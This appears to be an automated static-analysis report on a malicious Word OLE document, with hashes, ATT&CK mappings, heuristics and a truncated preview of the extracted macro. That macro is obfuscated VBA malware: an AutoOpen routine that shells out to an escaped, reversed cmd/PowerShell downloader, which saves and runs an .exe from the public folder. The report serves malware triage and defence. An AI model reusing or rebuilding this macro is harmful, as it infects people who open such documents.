Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ff6863ee8e1039eb…

Verdict: MALICIOUS
Type: Office (OLE)
Size: 60.7 KB
First seen: 2019-03-18
MD5: 7c3e0d6604be6fc4a5ba6ba236a0ddb0
SHA-1: 23076784784917e22aff8d160fa9aaa20d0a69f2
SHA-256: ff6863ee8e1039eb978f81560bf85e26066269e0fcdb2978333eb71945e9d474
Risk score: 122

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is an OLE document containing a legacy WordBasic AutoOpen macro. This macro is designed to execute a command upon opening, indicated by the 'Shell@' call. The obfuscated nature of the script prevents a full analysis of the executed command, but the presence of the AutoOpen marker and the legacy macro type strongly suggests malicious intent, likely to download and execute a secondary payload.

Heuristics (5)

  • OLE document has large unaccounted-for region (severity: high, rule: OLE_SLACK_ANOMALY)
    OLE file is 62,175 bytes but its declared streams total only 36,545 bytes — 25,630 bytes (41%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code.
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    Document contains an AutoOpen macro.
  • Legacy WordBasic auto-exec macro marker (severity: medium, rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5783 bytes
SHA-256: cd39cac4cff63e774f15e25b262526dfaedad972c50c2d5668683cd5e09fe3bc

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "OkVlhQFqzKskz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const pRsVFWlF = 0
   Dim JDjawZ(4)
JDjawZ(0) = Left(lLzRTvTJ, 277)
JDjawZ(1) = Left(lLzRTvTJ, 277)
JDjawZ(2) = Left(lLzRTvTJ, 277)
JDjawZ(3) = Mid(NcQCwcS, 322, 870)
   Dim WzBjbI(3)
WzBjbI(0) = Right(cPtfRz, 591)
WzBjbI(1) = Left(lLzRTvTJ, 277)
WzBjbI(2) = MidB(PLmGaNfW, 353, 844)
   Dim mdaHii(3)
mdaHii(0) = Left(lLzRTvTJ, 277)
mdaHii(1) = Mid(NcQCwcS, 322, 870)
mdaHii(2) = Right(cPtfRz, 591)
   Dim kdjvzK(2)
kdjvzK(0) = Left(lLzRTvTJ, 277)
kdjvzK(1) = Right(cPtfRz, 591)
   Dim OhWfv(3)
OhWfv(0) = Left(lLzRTvTJ, 277)
OhWfv(1) = Mid(NcQCwcS, 322, 870)
OhWfv(2) = Mid(NcQCwcS, 322, 870)
Shell@ kMPhW + ZUjQOrtsonbaBq + JiOwdEWnRV, CInt(pRsVFWlF)
   Dim MjJMX(5)
MjJMX(0) = Right(cPtfRz, 591)
MjJMX(1) = Right(cPtfRz, 591)
MjJMX(2) = MidB(PLmGaNfW, 353, 844)
MjJMX(3) = Right(cPtfRz, 591)
MjJMX(4) = Left(lLzRTvTJ, 277)
   Dim vGhsk(2)
vGhsk(0) = Left(lLzRTvTJ, 277)
vGhsk(1) = MidB(PLmGaNfW, 353, 844)
   Dim qUudwf(3)
qUudwf(0) = Right(cPtfRz, 591)
qUudwf(1) = Mid(NcQCwcS, 322, 870)
qUudwf(2) = Mid(NcQCwcS, 322, 870)
End Sub


Attribute VB_Name = "WQujRVwwzsiSCT"
Function kMPhW()
Dim JUioOY(4)
JUioOY(0) = Left(lLzRTvTJ, 277)
JUioOY(1) = Mid(NcQCwcS, 322, 870)
JUioOY(2) = Right(cPtfRz, 591)
JUioOY(3) = MidB(PLmGaNfW, 353, 844)
   Dim qLTflQ(2)
qLTflQ(0) = Right(cPtfRz, 591)
qLTflQ(1) = Mid(NcQCwcS, 322, 870)
   Dim jRWJV(2)
jRWJV(0) = MidB(PLmGaNfW, 353, 844)
jRWJV(1) = Mid(NcQCwcS, 322, 870)
   Dim GimiYJ(3)
GimiYJ(0) = MidB(PLmGaNfW, 353, 844)
GimiYJ(1) = Left(lLzRTvTJ, 277)
GimiYJ(2) = Right(cPtfRz, 591)
jKDrjwGYzX = Format(Chr(4 + 13 + 17 + 11 + 54)) + "md /V^:^O" + "/" + Format(Chr(3 + 9 + 11 + 8 + 36)) + Format(Chr(1 + 4 + 5 + 3 + 21)) + "^s^et ^s^W=^  ^  ^ ^    ^ ^" + "      ^ ^}^" + "}^{h" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "t^" + "a" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "}^;k^a^er^b;^Oi^L^$ m^e" + "^tI^-^e^k^ov" + "nI;)^O^i^L$ ,^OHV$(^el^i"
Dim LVmznJ(4)
LVmznJ(0) = Right(cPtfRz, 591)
LVmznJ(1) = MidB(PLmGaNfW, 353, 844)
LVmznJ(2) = MidB(PLmGaNfW, 353, 844)
LVmznJ(3) = MidB(PLmGaNfW, 353, 844)
   Dim Wpfzuf(3)
Wpfzuf(0) = Left(lLzRTvTJ, 277)
Wpfzuf(1) = Mid(NcQCwcS, 322, 870)
Wpfzuf(2) = Left(lLzRTvTJ, 277)
XSzvfEYWz = "^F^dao^lnw^oD^" + ".Rdp^${yr^t^{" + ")r^wE$ n^i^ OHV$(h" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "^a^ero^f;" + "^'^exe.'^+EEM$+'" + "\'+" + Format(Chr(4 + 13 + 17 + 11 + 54)) + "^i^l" + "^bup:vn^e$^=" + "^O^iL$"
Dim MzJGLR(4)
MzJGLR(0) = Left(lLzRTvTJ, 277)
MzJGLR(1) = Mid(NcQCwcS, 322, 870)
MzJGLR(2) = Right(cPtfRz, 591)
MzJGLR(3) = Left(lLzRTvTJ, 277)
... (truncated)